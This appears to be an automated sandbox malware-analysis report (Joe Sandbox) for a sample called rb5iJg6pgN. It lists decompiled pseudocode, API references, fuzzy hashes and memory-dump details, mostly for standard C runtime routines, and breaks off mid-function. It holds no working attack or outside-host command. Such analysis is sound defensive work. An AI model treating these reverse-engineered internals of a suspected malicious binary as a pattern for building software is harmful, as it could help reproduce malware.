0x0040958c
0x0040958d
0x0040958d
0x00000000
0x00409592
0x0040958a
0x00409576
0x0040956c
0x0040956c
0x0040956c
0x0040956c
0x004095c7

APIs

_fseek.LIBCMT ref: 004095B3

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: 60950d9221c26d27ee38a58b5263b7bcc0b2552a2f817c64ca74d8f4f5762f59
Instruction ID: defe030eca311efaacfb2cef9e11b0a1dbbca6697c271f215225222cc4f9d419
Opcode Fuzzy Hash: 60950d9221c26d27ee38a58b5263b7bcc0b2552a2f817c64ca74d8f4f5762f59
Instruction Fuzzy Hash: 4311067361121576DF270A2B9C01B6B36899B467A0F18403BFD4AB62D3FA3CDD12829D

Uniqueness

Uniqueness Score: -1,00%

Function 0040435A, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040435A(void* __ecx) {
				void* _t12;
				void* _t13;
				void* _t16;
				void* _t20;
				void* _t29;
				void* _t31;

				E00432414(0x44ccfd, _t31);
				_t29 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					L3:
					_t12 = 0;
					__eflags = 0;
				} else {
					_push( *((intOrPtr*)(_t31 + 0x10)));
					_push( *((intOrPtr*)(_t31 + 0xc)));
					_t13 = E004095C8(_t20,  *((intOrPtr*)(_t31 + 8))); // executed
					_t37 = _t13;
					if(_t13 == 0) {
						goto L3;
					} else {
						E004027AE(_t13, _t29, _t13, 1);
						_t5 = _t31 + 0x10; // 0x11
						_t16 = E00404209(_t29, _t5);
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_push(_t16);
						E00402893(_t29, E00401810(_t37));
						_t8 = _t31 + 0x10; // 0x11
						L00401F1F(_t8);
						_t12 = _t29;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t12;
			}

0x0040435f
0x00404365
0x0040436b
0x004043b6
0x004043b6
0x004043b6
0x0040436d
0x0040436d
0x00404370
0x00404376
0x0040437e
0x00404380
0x00000000
0x00404382
0x00404387
0x0040438c
0x00404392
0x00404397
0x0040439b
0x004043a5
0x004043aa
0x004043ad
0x004043b2
0x004043b2
0x00404380
0x004043bc
0x004043c4

APIs

__EH_prolog.LIBCMT ref: 0040435F

Part of subcall function 00401810: __EH_prolog.LIBCMT ref: 00401815
Part of subcall function 00401810: std::_Lockit::_Lockit.LIBCPMT ref: 00401824
Part of subcall function 00401810: int.LIBCPMT ref: 0040183B

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: H_prolog$LockitLockit::_std::_
String ID:
API String ID: 1572246634-0
Opcode ID: e58443573e78c964349f37b2d36a78ebfe548b1d4759b03eed5d46902f210a56
Instruction ID: 7616b57ed0e51d3488b3ebd64a1de486ed97272b41ef8ba874c5b7c656dc733c
Opcode Fuzzy Hash: e58443573e78c964349f37b2d36a78ebfe548b1d4759b03eed5d46902f210a56
Instruction Fuzzy Hash: 5DF062B2610114ABCB15FF658C02B9E33D9AB44748F00443FFA16B21C2DBBC8A508799

Uniqueness

Uniqueness Score: -1,00%

Function 00401AA0, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401AA0(void* __ebx, intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t5;
				intOrPtr* _t11;
				intOrPtr* _t12;
				void* _t13;

				_t11 = __ecx;
				_push(4);
				 *__ecx = 0x44d52c;
				_t12 = E0043057C(__ebx, __ecx, _t13);
				_t14 = _t12;
				if(_t12 == 0) {
					_t12 = 0;
					__eflags = 0;
				} else {
					_push(1); // executed
					_t5 = E00409212(__ebx, _t11, _t12, _t14); // executed
					 *_t12 = _t5;
				}
				 *((intOrPtr*)(_t11 + 0x34)) = _t12;
				E004027F8(_t11);
				return _t11;
			}

0x00401aa2
0x00401aa4
0x00401aa6
0x00401ab1
0x00401ab4
0x00401ab6
0x00401ac4
0x00401ac4
0x00401ab8
0x00401ab8
0x00401aba
0x00401ac0
0x00401ac0
0x00401ac8
0x00401acb
0x00401ad4

APIs

Part of subcall function 0043057C: _malloc.LIBCMT ref: 00430594

std::locale::_Init.LIBCPMT ref: 00401ABA

Part of subcall function 00409212: __EH_prolog3.LIBCMT ref: 00409219
Part of subcall function 00409212: std::_Lockit::_Lockit.LIBCPMT ref: 00409223
Part of subcall function 00409212: std::locale::_Setgloballocale.LIBCPMT ref: 0040923F
Part of subcall function 00409212: _Yarn.LIBCPMT ref: 00409255

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: std::locale::_$H_prolog3InitLockitLockit::_SetgloballocaleYarn_mallocstd::_
String ID:
API String ID: 2823998849-0
Opcode ID: 39618be87586018735314d777e51a7d46c60955cde1f096c7fcc7dbf65dec6e3
Instruction ID: c835268fa3dd7587b19f293f82b8fd0ea8418e434df9e3d446ba5a5990f9fc2b
Opcode Fuzzy Hash: 39618be87586018735314d777e51a7d46c60955cde1f096c7fcc7dbf65dec6e3
Instruction Fuzzy Hash: FAE0C276B061227AD210AB6E640125AE6D49FC4B64B19003FF100AB3D1CBF84C015EED

Uniqueness

Uniqueness Score: -1,00%

Function 004305FF, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004305FF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t17;

				_push(0xc);
				_push(0x4675d8);
				E004391D0(__ebx, __edi, __esi);
				E0043163F();
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				_t8 = E0043063F( *((intOrPtr*)(_t17 + 8))); // executed
				 *((intOrPtr*)(_t17 - 0x1c)) = _t8;
				 *(_t17 - 4) = 0xfffffffe;
				E00430639();
				return E00439215(_t8);
			}

0x004305ff
0x00430601
0x00430606
0x0043060b
0x00430610
0x00430617
0x0043061f
0x00430622
0x00430629
0x00430635

APIs

Part of subcall function 0043163F: __lock.LIBCMT ref: 00431641

__onexit_nolock.LIBCMT ref: 00430617

Part of subcall function 0043063F: RtlDecodePointer.NTDLL(?,?,00000000,?,?,0043061C,?,004675D8,0000000C,00430700,?,?,0043156F,0043B9F9), ref: 00430652
Part of subcall function 0043063F: RtlDecodePointer.NTDLL(?,?,00000000,?,?,0043061C,?,004675D8,0000000C,00430700,?,?,0043156F,0043B9F9), ref: 0043065D
Part of subcall function 0043063F: __realloc_crt.LIBCMT ref: 0043069E
Part of subcall function 0043063F: __realloc_crt.LIBCMT ref: 004306B2
Part of subcall function 0043063F: EncodePointer.KERNEL32(00000000,?,?,00000000,?,?,0043061C,?,004675D8,0000000C,00430700,?,?,0043156F,0043B9F9), ref: 004306C4
Part of subcall function 0043063F: RtlEncodePointer.NTDLL(?,?,?,00000000,?,?,0043061C,?,004675D8,0000000C,00430700,?,?,0043156F,0043B9F9), ref: 004306D2
Part of subcall function 0043063F: RtlEncodePointer.NTDLL(00000004,?,?,00000000,?,?,0043061C,?,004675D8,0000000C,00430700,?,?,0043156F,0043B9F9), ref: 004306DE

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 3709f9f95a900edf24bca154f48217ec9150a9758f24fcd04296732f8e6057fb
Instruction ID: 5b4a618af49d0163fd3a149c3d7723341490ce8b46d07c33296fd90c3939db91
Opcode Fuzzy Hash: 3709f9f95a900edf24bca154f48217ec9150a9758f24fcd04296732f8e6057fb
Instruction Fuzzy Hash: 6AD05E71900614AADB10BBFA880774C76605F48728F6062CFB014BA1E2CABC4E128A9E

Uniqueness

Uniqueness Score: -1,00%

Function 004095D1, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004095D1(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t14;

				_push(_a12);
				_push( *((intOrPtr*)(0x44e6f0 + _a8 * 4)));
				_push(_a4);
				_t7 = E0043496D(_t8, _t9, _t10, _t11, _t14); // executed
				return _t7;
			}

0x004095d4
0x004095da
0x004095e1
0x004095e4
0x004095ed

APIs

__fsopen.LIBCMT ref: 004095E4

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 4f6b7143e1248f9089d783107696b1575c952e544ee83694d159a39b01daaa68
Instruction ID: 0f18e69660c4d680226c9b6ca2c09cd79f9a86bfd1c01e6db073d82f9481eaff
Opcode Fuzzy Hash: 4f6b7143e1248f9089d783107696b1575c952e544ee83694d159a39b01daaa68
Instruction Fuzzy Hash: 8EC04C7540020CBBCF415F96EC0189A3B69BB99368F414461FD1C15231D637E671DA95

Uniqueness

Uniqueness Score: -1,00%

Function 0044CEBE, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044CEBE() {
				void* _t2;
				void* _t5;

				L00408C6E(0x46b830);
				_t2 = E004306F5(_t5, 0x44cfb0); // executed
				return _t2;
			}

0x0044cec3
0x0044cecd
0x0044ced3

APIs

std::_Init_locks::_Init_locks.LIBCPMT ref: 0044CEC3

Part of subcall function 00408C6E: InterlockedIncrement.KERNEL32(00469394), ref: 00408C76

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: IncrementInit_locksInit_locks::_Interlockedstd::_
String ID:
API String ID: 1108670720-0
Opcode ID: b34b0360b58903b40f7f27e4ce0504e48d693c60547c053797c62e533b146ced
Instruction ID: 02f5db7467b8d327f08ee0d5c7f4f451b4265bcad943b8efe8c87f903287724d
Opcode Fuzzy Hash: b34b0360b58903b40f7f27e4ce0504e48d693c60547c053797c62e533b146ced
Instruction Fuzzy Hash: 08A0228028320800200832F203B320C022388C030CB30A03FF2C3220CA2FAC08B0003F

Uniqueness

Uniqueness Score: -1,00%

Function 0044CF4D, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044CF4D() {
				void* _t2;
				void* _t5;

				L00408C6E(0x46b90b);
				_t2 = E004306F5(_t5, 0x44cfe2); // executed
				return _t2;
			}

0x0044cf52
0x0044cf5c
0x0044cf62

APIs

std::_Init_locks::_Init_locks.LIBCPMT ref: 0044CF52

Part of subcall function 00408C6E: InterlockedIncrement.KERNEL32(00469394), ref: 00408C76

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: IncrementInit_locksInit_locks::_Interlockedstd::_
String ID:
API String ID: 1108670720-0
Opcode ID: bb5aa7643b94274157d04135428a98a24d5750e962e1fe04535cf7625c33c9a1
Instruction ID: 43570ec4ca3cb9b21945ec53ccb25e86467df495ca2d250bb3ff899e9c46298a
Opcode Fuzzy Hash: bb5aa7643b94274157d04135428a98a24d5750e962e1fe04535cf7625c33c9a1
Instruction Fuzzy Hash: 39A001A528650895664832B716A7A28012699C471AB35516FB282A44C62E9C08A910AE

Uniqueness

Uniqueness Score: -1,00%

Function 0044CF6F, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044CF6F() {
				void* _t2;
				void* _t5;

				L00408C6E(0x46ba00);
				_t2 = E004306F5(_t5, 0x44cff6); // executed
				return _t2;
			}

0x0044cf74
0x0044cf7e
0x0044cf84

APIs

std::_Init_locks::_Init_locks.LIBCPMT ref: 0044CF74

Part of subcall function 00408C6E: InterlockedIncrement.KERNEL32(00469394), ref: 00408C76

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: IncrementInit_locksInit_locks::_Interlockedstd::_
String ID:
API String ID: 1108670720-0
Opcode ID: e56d5a677ef7d6e343694cc093981706d8d314d5462176197d6ab096afec3ce6
Instruction ID: 4e68f62ee2c51eefac84be481a3a819125e4826b3eb0c3bbb530ed23298b271f
Opcode Fuzzy Hash: e56d5a677ef7d6e343694cc093981706d8d314d5462176197d6ab096afec3ce6
Instruction Fuzzy Hash: FAA0014628A54855A55836A616A7519122299C872EB34516FB283644C61E9C08A5506E

Uniqueness

Uniqueness Score: -1,00%

Function 0043BBFF, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(0043BBB8,004315F8,00000000,00000000,00000000,00000000,00000000,00000000,?,0043CD4E,00435CDC,004677A0,00000014), ref: 0043BC04

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 155b3de0532c83717af678f8162267c02c0668e5423a975de742ae56d00fc487
Instruction ID: 85c28aabc2f18d4c571a4c2fe315c39b04cd963302e3a708e2e0b1b078c50b8a
Opcode Fuzzy Hash: 155b3de0532c83717af678f8162267c02c0668e5423a975de742ae56d00fc487
Instruction Fuzzy Hash: E9A022B8800300CF83008FA0AC882003A20E388B02B2000F3EE008032CEFB000C0CF0F

Uniqueness

Uniqueness Score: -1,00%

Function 002C28DE, Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?), ref: 002C2968

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 5aa5be3ce18041406f56d72a5903c34fd82a0c30875001f7a54582b8e76e8571
Instruction ID: 47d6bea16415d39dd853341b54f70751a6ec58c1e2cf4c88903ef4d566d4c624
Opcode Fuzzy Hash: 5aa5be3ce18041406f56d72a5903c34fd82a0c30875001f7a54582b8e76e8571
Instruction Fuzzy Hash: A351B0B0D10209EBDB18DFA8D894BEEBBB5BF88304F148229E415B7344DB349955CF64

Uniqueness

Uniqueness Score: -1,00%

Non-executed Functions

Function 00407FF4, Relevance: 80.9, APIs: 45, Strings: 1, Instructions: 428windowmemoryencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407FF9
GetDialogBaseUnits.USER32 ref: 00408052
GetDialogBaseUnits.USER32 ref: 0040805C
BeginDeferWindowPos.USER32(00000000), ref: 00408069
DeferWindowPos.USER32(?,00000000,00000000,00000000,00000096,00000014,00000014), ref: 00408091
DeferWindowPos.USER32(00000000,00000000,000000C8,00000000,00000096,00000014,00000014), ref: 004080FC
DeferWindowPos.USER32(00000000,00000000,00000190,00000000,00000096,00000014,00000014), ref: 00408155
EndDeferWindowPos.USER32(00000000), ref: 00408158
DefWindowProcA.USER32(?,?,?,?), ref: 00408196
GetMenu.USER32 ref: 004081BA
GetMenu.USER32(00000000), ref: 004081CB
GetSubMenu.USER32(00000000), ref: 004081D4
GetSubMenu.USER32(00000000), ref: 004081D7
GetMenu.USER32(00000000), ref: 004081E0
GetSubMenu.USER32(00000000), ref: 004081E3
GetMenu.USER32(00000000), ref: 004081EC
GetSubMenu.USER32(00000000), ref: 004081EF
GetMenu.USER32(00000000), ref: 004081F8
GetSubMenu.USER32(00000000), ref: 004081FB
SendMessageA.USER32(00000000,00000229,00000000,00000000), ref: 00408211
SendMessageA.USER32(00000000,00000488,00000000,00000000), ref: 00408237
CheckMenuItem.USER32(?,00000000), ref: 00408255
CheckMenuItem.USER32(?,00000000), ref: 00408266
CheckMenuItem.USER32(?,00000000), ref: 00408279
CheckMenuItem.USER32(?,00000000), ref: 0040828A
CheckMenuItem.USER32(?,00000000), ref: 0040829A
EnableMenuItem.USER32(?,0000000A,00000000), ref: 004082D2
SendMessageA.USER32(00000000,0000046A,00000000,00000000), ref: 004082E2
EnableMenuItem.USER32(?,00000000), ref: 004082FD
SendMessageA.USER32(00000000,0000046A,00000000,00000000), ref: 00408307
EnableMenuItem.USER32(?,00000000), ref: 00408324
EnableMenuItem.USER32(?,00000000), ref: 0040833B
EnableMenuItem.USER32(?,00000001), ref: 00408346
EnableMenuItem.USER32(?,00000001), ref: 00408351
EnableMenuItem.USER32(?,00000002,00000000), ref: 00408386
EnableMenuItem.USER32(?,00000000), ref: 004083A1
GetLastError.KERNEL32 ref: 004083BE
CreateBindCtx.OLE32(00000400,?), ref: 004083EC
CreateRectRgn.GDI32 ref: 00408415
CombineRgn.GDI32(00000000,00000000,00000000,00000001), ref: 0040842C
CertDuplicateStore.CRYPT32(?), ref: 00408453
GlobalAlloc.KERNEL32(00000040,00000200,?,00000000,?,00000000,?,00000000), ref: 00408529
DialogBoxIndirectParamA.USER32(?,00000000,00000000,00408568,?), ref: 00408539

Strings

U, xrefs: 00408490

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Menu$Item$Enable$Window$CheckDefer$MessageSend$Dialog$BaseCreateUnits$AllocBeginBindCertCombineDuplicateErrorGlobalH_prologIndirectLastParamProcRectStore
String ID: U
API String ID: 2911220670-3372436214
Opcode ID: b0873f36c7dc0636976edbf470c6c034a3445395b3e297545e20978dd367604a
Instruction ID: 34a2d0a3a4cab88335d13ac717d00334ddb1da7193d3ae47e83c3a649dc40ba0
Opcode Fuzzy Hash: b0873f36c7dc0636976edbf470c6c034a3445395b3e297545e20978dd367604a
Instruction Fuzzy Hash: 83E1AC71500704AFD711DF64DD85B6A7BAAFB88B04F00053EF645A72A0EBB9A8508F5B

Uniqueness

Uniqueness Score: -1,00%

Function 004398DB, Relevance: 21.5, APIs: 14, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E004398DB(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				void* _v6848;
				signed int _v6852;
				short _v6856;
				signed int _v6860;
				signed int _v6864;
				signed int _v6868;
				char _v6872;
				long _v6876;
				long _v6880;
				char _v6881;
				long _v6888;
				intOrPtr _v6892;
				signed int _v6896;
				int _v6900;
				void* __edi;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				signed int _t267;
				signed int* _t269;
				signed int _t274;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t290;
				short _t293;
				signed int _t294;
				signed int _t300;
				void* _t305;
				signed int _t310;
				int _t311;
				short _t313;
				signed int _t315;
				void* _t316;
				signed int _t321;
				void* _t323;
				signed int _t324;
				long _t328;
				signed int _t332;
				signed int _t338;
				void* _t345;
				short _t349;
				void* _t350;
				signed char _t360;
				signed int _t361;
				signed int _t362;
				signed int* _t363;
				long _t364;
				char* _t365;
				long _t366;
				signed int _t367;
				signed int _t368;
				signed int _t370;
				intOrPtr _t371;
				short _t378;
				signed int _t379;
				signed int _t382;
				signed int _t384;
				signed int _t387;
				char _t390;
				signed int _t391;
				signed int _t392;
				signed short* _t395;
				void* _t396;
				char _t397;
				short _t403;
				signed int _t404;
				signed int _t406;
				short _t407;
				intOrPtr _t412;
				intOrPtr* _t413;
				signed int _t414;
				signed int _t416;
				char _t417;
				signed int _t422;
				signed int _t423;
				signed short* _t424;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				void* _t429;

				_t419 = __esi;
				_t357 = __ebx;
				L00434BC0(0x1af0);
				_t252 =  *0x469acc; // 0x6f159cef
				_v8 = _t252 ^ _t428;
				_t254 = _a4;
				_t368 = _a8;
				_t403 = 0;
				_t414 = 0;
				_v6852 = _t254;
				_v6848 = _t368;
				_v6856 = 0;
				_v6872 = 0;
				if(_a12 != 0) {
					__eflags = _t368;
					if(__eflags != 0) {
						_push(__ebx);
						_push(__esi);
						_t370 = _t254 >> 5;
						_t422 = (_t254 & 0x0000001f) << 6;
						_v6868 = _t370;
						_t371 =  *((intOrPtr*)(0x46c2a0 + _t370 * 4));
						_v6896 = _t422;
						_t360 =  *((intOrPtr*)(_t422 + _t371 + 0x24)) +  *((intOrPtr*)(_t422 + _t371 + 0x24)) >> 1;
						__eflags = _t360 - 2;
						if(_t360 == 2) {
							L6:
							__eflags =  !_a12 & 0x00000001;
							if(__eflags != 0) {
								_t254 = _v6852;
								L9:
								__eflags =  *(_t422 + _t371 + 4) & 0x00000020;
								if(__eflags != 0) {
									L0043AB3C(_t371, __eflags, _t254, _t403, _t403, 2);
									_t429 = _t429 + 0x10;
								}
								_t257 = L00444A25(_v6852);
								__eflags = _t257;
								if(_t257 == 0) {
									L50:
									_t259 =  *((intOrPtr*)(0x46c2a0 + _v6868 * 4));
									__eflags =  *(_t422 + _t259 + 4) & 0x00000080;
									if(( *(_t422 + _t259 + 4) & 0x00000080) == 0) {
										_t260 = WriteFile( *(_t422 + _t259), _v6848, _a12,  &_v6876, 0);
										__eflags = _t260;
										if(_t260 == 0) {
											goto L92;
										}
										_t414 = _v6876;
										_t423 = 0;
										goto L93;
									}
									_t403 = _v6848;
									_t423 = 0;
									_v6860 = 0;
									__eflags = _t360;
									if(_t360 != 0) {
										_t378 = _t403;
										__eflags = _t360 - 2;
										if(_t360 != 2) {
											_t362 = _a12;
											_v6880 = _t378;
											__eflags = _t362;
											if(_t362 == 0) {
												goto L99;
											}
											_v6892 = 0xa;
											do {
												_v6888 = _v6888 & 0x00000000;
												_t424 = _v6880;
												_t379 = _t378 - _t403;
												__eflags = _t379;
												_t404 = _v6888;
												_t269 =  &_v1724;
												do {
													__eflags = _t379 - _t362;
													if(_t379 >= _t362) {
														break;
													}
													_t416 =  *_t424 & 0x0000ffff;
													_t424 =  &(_t424[1]);
													_t379 = _t379 + 2;
													_v6880 = _t424;
													__eflags = _t416 - _v6892;
													if(_t416 == _v6892) {
														_t426 = 0xd;
														 *_t269 = _t426;
														_t424 = _v6880;
														_t269 =  &(_t269[0]);
														_t404 = _t404 + 2;
														__eflags = _t404;
													}
													 *_t269 = _t416;
													_t404 = _t404 + 2;
													_t269 =  &(_t269[0]);
													__eflags = _t404 - 0x6a8;
												} while (_t404 < 0x6a8);
												asm("cdq");
												_t274 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t269 -  &_v1724 - _t404 >> 1,  &_v5140, 0xd55, 0, 0);
												_t423 = _v6860;
												_t414 = _v6856;
												_v6864 = _t274;
												__eflags = _t274;
												if(_t274 == 0) {
													goto L92;
												}
												_t382 = 0;
												__eflags = 0;
												_v6852 = 0;
												while(1) {
													_t280 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4))),  &(( &_v5140)[_t382]), _t274 - _t382,  &_v6876, 0);
													__eflags = _t280;
													if(_t280 == 0) {
														break;
													}
													_t382 = _v6852 + _v6876;
													_t274 = _v6864;
													_v6852 = _t382;
													__eflags = _t274 - _t382;
													if(_t274 > _t382) {
														continue;
													}
													L87:
													__eflags = _t282 - _t384;
													if(_t282 > _t384) {
														goto L93;
													}
													goto L88;
												}
												_t281 = GetLastError();
												_t384 = _v6852;
												_t423 = _t281;
												_t282 = _v6864;
												_v6860 = _t423;
												goto L87;
												L88:
												_t378 = _v6880;
												_t403 = _v6848;
												_t414 = _t378 - _t403;
												_v6856 = _t414;
												__eflags = _t414 - _t362;
											} while (_t414 < _t362);
											goto L94;
										}
										_v6852 = _t378;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L99;
										}
										_v6892 = 0xa;
										do {
											_v6888 = _v6888 & 0x00000000;
											_t417 = _v6872;
											_t284 = _t378 - _t403;
											__eflags = _t284;
											_t406 = _v6888;
											_t363 =  &_v6844;
											do {
												__eflags = _t284 - _a12;
												if(_t284 >= _a12) {
													break;
												}
												_t427 =  *_t378 & 0x0000ffff;
												_t378 = _t378 + 2;
												_t284 = _t284 + 2;
												_v6852 = _t378;
												__eflags = _t427 - _v6892;
												if(_t427 == _v6892) {
													_t387 = 0xd;
													 *_t363 = _t387;
													_t378 = _v6852;
													_t417 = _t417 + 2;
													_t363 =  &(_t363[0]);
													_t406 = _t406 + 2;
													__eflags = _t406;
												}
												 *_t363 = _t427;
												_t406 = _t406 + 2;
												_t363 =  &(_t363[0]);
												__eflags = _t406 - 0x13fe;
											} while (_t406 < 0x13fe);
											_t364 = _t363 -  &_v6844;
											_v6872 = _t417;
											_t290 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x46c2a0 + _v6868 * 4))),  &_v6844, _t364,  &_v6876, 0);
											_t423 = _v6860;
											_t414 = _v6856;
											__eflags = _t290;
											if(_t290 == 0) {
												goto L92;
											}
											_t414 = _t414 + _v6876;
											_t403 = _v6848;
											_v6856 = _t414;
											__eflags = _v6876 - _t364;
											if(_v6876 < _t364) {
												goto L94;
											}
											_t378 = _v6852;
											__eflags = _t378 - _t403 - _a12;
										} while (_t378 - _t403 < _a12);
										goto L94;
									}
									_t293 = _t403;
									_v6856 = _t293;
									__eflags = _a12;
									if(_a12 <= 0) {
										goto L99;
									} else {
										goto L53;
									}
									do {
										L53:
										_t294 = _t293 - _t403;
										__eflags = _t294;
										_t407 = _v6856;
										_t365 =  &_v6844;
										_v6852 = 0;
										do {
											__eflags = _t294 - _a12;
											if(_t294 >= _a12) {
												break;
											}
											_t390 =  *_t407;
